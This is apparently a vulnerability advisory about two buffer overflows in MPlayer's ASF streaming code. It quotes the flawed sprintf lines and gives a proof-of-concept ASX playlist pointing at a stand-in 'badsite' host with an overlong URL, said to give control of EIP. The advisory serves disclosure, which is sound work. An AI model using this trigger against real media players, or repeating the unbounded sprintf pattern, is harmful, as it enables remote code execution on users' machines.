Favorite Linux Player Buffer Overflow Product: Mplayer Developers: http://www.mplayerhq.hu OS: Port to All *NIX and Win32 Remote Exploitable: YES Developers has been contacted, problem was fixed, recomended update your mplayer version. In the source tree there is a file called asf_streaming.c this file has a function named asf_http_request, that function has two buffer overflows, this overflows are in the sprintf lines. asf_http_request { char str[250]; .... ... .. sprintf( str, "Host: %s:%d", server_url->hostname, server_url->port ); .... ... .. sprintf( str, "Host: %s:%d", url->hostname, url->port ); .... ... .. } This, at a first look, may look as it can´t be exploited ( because the MAXHOSTLEN size restriction )... but if in an ASX file like this with a "badsite" listening in "badport" send "\n\n" as answer you could lead to a fully controllable EIP buffer overflow <asx version = "3.0"> <title>Bas Site ASX</title> <moreinfo href = "mailto:info@badsite.com <mailto:info@badsite.com> " /> <logo href = "http://www.badsite.com/streaming/grupo.gif <http://www.badsite.com/streaming/grupo.gif> " style="ICON" /> <banner href= "images/bannermitre.gif"> <abstract>Bad Site live</abstract> <moreinfo target="_blank" href = "http://www.badsite.com/ <http://www.badsite.com/> " /> </banner> <entry> <title>NEWS</title> <AUTHOR>NEWS</AUTHOR> <COPYRIGHT>© All by the news</COPYRIGHT> <ref href = "http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaa"/> <logo href = "http://www.badsite.com/streaming/grupo.gif <http://badsite.com/streaming/grupo.gif> " style="ICON" /> </entry> </asx> Regards, Hernán Otero hernan.otero@eds.com
